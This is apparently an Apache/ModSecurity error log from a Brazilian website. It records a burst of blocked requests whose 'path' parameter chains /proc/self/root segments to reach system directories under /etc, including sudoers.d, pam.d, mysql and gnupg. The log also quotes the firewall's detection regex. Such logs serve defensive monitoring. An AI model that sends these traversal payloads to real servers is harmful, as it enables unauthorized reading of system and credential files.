[Wed Mar 18 05:51:32.351722 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:46016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnlMdf6f5d65gmYZSgEwAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:51:39.660447 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:35866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnm8df6f5d65gmYZSgHQAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:51:41.088132 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:46844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnneoXxyEfFpUF8f86fwAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:51:42.392228 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:46860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnnuyqAr6etmhZHNqJYwAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:51:48.063631 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:46876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnpNY0UrI5A3LftIxkxAAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:51:49.226856 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.241.31:46024] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnpSmAPhZkrhU8w4k8owAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:51:55.202785 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:46590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnq9Y0UrI5A3LftIxkzgAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:52:05.399373 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:46602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpntUzinOy1jxa1j4fgMAAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:52:07.676587 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.241.31:47014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpntwkwaGbbGflqUZDfEwAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:52:22.019838 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:58914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnxuoXxyEfFpUF8f86mQAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:52:24.575747 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:54774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpnyNY0UrI5A3LftIxk7gAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:53:13.779456 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:34716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpn-da6ubjKNq_cu4ZkAQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:53:19.511520 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:39178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpn_9a6ubjKNq_cu4ZkCQAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:53:24.460817 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:35726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoBOyqAr6etmhZHNqJqgAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:53:32.339196 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:50110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoDMdf6f5d65gmYZSgRgAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:53:33.933100 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:36732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoDda6ubjKNq_cu4ZkEgAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:53:35.221008 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:48456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoD-w_le52K8_3pV2u9QAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:53:43.435338 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:48462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoFwkwaGbbGflqUZDfNgAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:53:53.335933 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:36746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoIfu8EFLIOrSqIpvUDAAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:53:54.687186 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.243.128:40450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoItY0UrI5A3LftIxlDAAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:53:57.311134 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:54206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoJeoXxyEfFpUF8f86zwAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
